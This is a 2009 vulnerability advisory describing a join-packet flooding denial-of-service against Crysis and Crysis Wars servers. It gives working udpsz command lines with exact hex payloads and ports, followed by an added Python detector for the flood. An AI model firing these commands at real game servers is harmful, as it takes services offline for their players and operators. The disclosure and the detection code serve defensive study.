#######################################################################

Luigi Auriemma

Application:  Crysis
              http://www.ea.com/crysis/home.jsp
              Crysis Wars / Warhead
              http://crysiswarhead.ea.com
Versions:     Crysis <= 1.21
              Crysis Wars <= 1.5
Platforms:    Windows (the Linux server has not been tested but should be
              vulnerable too)
Bug:          freezing during join packets flooding
Exploitation: remote, versus server
Date:         21 Jul 2009
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Crysis is a recent FPS game developed by Crytek (http://www.crytek.com)
and released in November 2007. The game is well known for being a
"computer killer" due to its high hardware requirements, but also for
its various problems with cheaters.
Crysis Wars is instead a stand-alone multiplayer expansion and sequel,
also known as Crysis Warhead.

#######################################################################

======
2) Bug
======

Crysis handles join packets very badly, with the result that it is
possible to block the game server by simply flooding it with these
packets.
In practice, when a join packet is received, some operations are
performed on it and on data derived from it, such as the verification
of the cdkey hash with the Gamespy master server.
So after simply sending the same join packet (even an invalid and
incomplete one) repeatedly, with a delay of at least 40 milliseconds
between packets (depending on the computer and the desired effect on
the server), the CPU usage was observed rising to 100% and, at the same
time, the server became unavailable: it started to ignore the incoming
packets of the other players or failed to handle them in time.

This is an exaggerated behaviour for a game server considering the rate
and size of the packets, and the fact that this is a type of "test"
which requires no skill to invent and perform (indeed I had doubts
about reporting it, until I noticed that my test server seemed down
under a light flooding).

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

quick example for Crysis Wars 1.5:

  udpsz -C 3c00001a49000000010000000100000001000000060000000300000000 -l 10 -S SERVER 64100 -1

quick example for Crysis 1.21:

  udpsz -C 3c0000180C000000010000000100000001000000060000000300000000 -l 10 -S SERVER 64087 -1

#######################################################################

======
4) Fix
======

No fix

#######################################################################
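Since section 4 offers no vendor fix, a server operator can at least detect the join-packet flood described in section 2 from captured traffic. The following Python is an added example, not part of the advisory or of udpsz; it assumes that join packets keep the leading bytes shown in the udpsz examples, and the 1-second window and the 10-joins-per-source threshold are assumptions rather than values from the advisory.

```python
"""Rate-based detector for the Crysis join-packet flood (added example).

Given UDP datagram records (timestamp, source address, destination port,
payload), it flags any source that sends join packets to the game port
faster than a threshold. Join packets are recognised by the leading bytes
of the advisory's udpsz examples (assumption: that prefix is stable).
"""
from collections import defaultdict, deque

# Ports and payload prefixes taken from the advisory's udpsz examples.
GAME_PORTS = {64100, 64087}            # Crysis Wars 1.5 / Crysis 1.21
JOIN_PREFIXES = (bytes.fromhex("3c00001a49"), bytes.fromhex("3c0000180c"))
# The advisory reports ~40 ms spacing as enough to pin the server; the
# window and limit below are assumed thresholds, not advisory values.
WINDOW_SEC = 1.0
MAX_JOINS_PER_WINDOW = 10


def is_join_packet(dport, payload):
    """True when the datagram targets a game port and looks like a join."""
    return dport in GAME_PORTS and payload.startswith(JOIN_PREFIXES)


def detect_join_flood(records, window=WINDOW_SEC, limit=MAX_JOINS_PER_WINDOW):
    """records: iterable of (t_seconds, src_ip, dst_port, payload_bytes).
    Returns {src_ip: timestamp at which that source exceeded the limit}."""
    recent = defaultdict(deque)   # src -> join timestamps inside the window
    alerts = {}
    for t, src, dport, payload in sorted(records, key=lambda r: r[0]):
        if not is_join_packet(dport, payload):
            continue
        q = recent[src]
        q.append(t)
        while q and t - q[0] > window:   # drop joins older than the window
            q.popleft()
        if len(q) > limit and src not in alerts:
            alerts[src] = t
    return alerts


# Constructed sample traffic: one legitimate joiner, one flooding source
# sending the same join packet every 40 ms, and some unrelated traffic.
JOIN_WARS = bytes.fromhex(
    "3c00001a49000000010000000100000001000000060000000300000000")
SAMPLE = [(0.0, "10.0.0.5", 64100, JOIN_WARS)]
SAMPLE += [(i * 0.04, "192.0.2.77", 64100, JOIN_WARS) for i in range(30)]
SAMPLE += [(0.5, "10.0.0.9", 64100, b"\x00\x01gameplay")]

if __name__ == "__main__":
    print(detect_join_flood(SAMPLE))   # only 192.0.2.77 is reported
```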